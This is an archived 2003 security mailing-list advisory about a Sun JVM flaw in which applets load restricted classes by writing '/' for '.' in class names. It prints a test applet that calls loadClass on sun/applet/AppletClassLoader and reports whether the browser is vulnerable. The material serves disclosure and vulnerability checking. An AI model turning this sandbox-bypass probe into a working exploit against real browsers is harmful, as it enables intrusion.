[EXPL] Security vulnerability in SUN's Java Virtual Machine Implementation (Test)
From: SecuriTeam (support_at_securiteam.com)
Date: 10/28/03
- Previous message: SecuriTeam: "[EXPL] Musicqueue Multiple Local Vulnerabilities (/tmp/musicqueue.crash Symblink, Language Overflow)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 28 Oct 2003 15:51:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Security vulnerability in SUN's Java Virtual Machine Implementation (Test)
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article
<http://www.securiteam.com/securitynews/6A00P0U8KM.html> Security
Vulnerability in SUN's Java Virtual Machine Implementation ('/' Replaces
'.'), a vulnerability exists in the way Sun has implemented its JVM. The
vulnerability allows loading restricted classes by issuing a request for a
class using the '/' delimiter instead of the '.' delimiter. The following
is a test that can be conducted on your browser to verify whether you are
vulnerable to this vulnerability or not.
DETAILS
The following applet tests for this vulnerability:
import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;
public class Simple extends Applet {
StringBuffer buffer;
public void init() {
buffer = new StringBuffer();
}
public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla = cl.loadClass("sun/applet/AppletClassLoader");
// Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not
Vulnerable!");
}
}
void addItem(String newWord) {
System.out.println(newWord);
buffer.append(newWord);
repaint();
}
public void paint(Graphics g) {
//Draw a Rectangle around the applet's display area.
g.drawRect(0, 0, size().width - 1, size().height - 1);
//Draw the current string inside the rectangle.
g.drawString(buffer.toString(), 5, 15);
}
}
This test can also be found here:
<http://bcheck.scanit.be/bcheck/applet.html>
http://bcheck.scanit.be/bcheck/applet.html.
If Sun Java VM is installed, the applet will inform you whether you are
vulnerable or not.
ADDITIONAL INFORMATION
The information has been provided by <mailto:alla@scanit.be> Alla
Bezroutchko.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] Musicqueue Multiple Local Vulnerabilities (/tmp/musicqueue.crash Symblink, Language Overflow)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
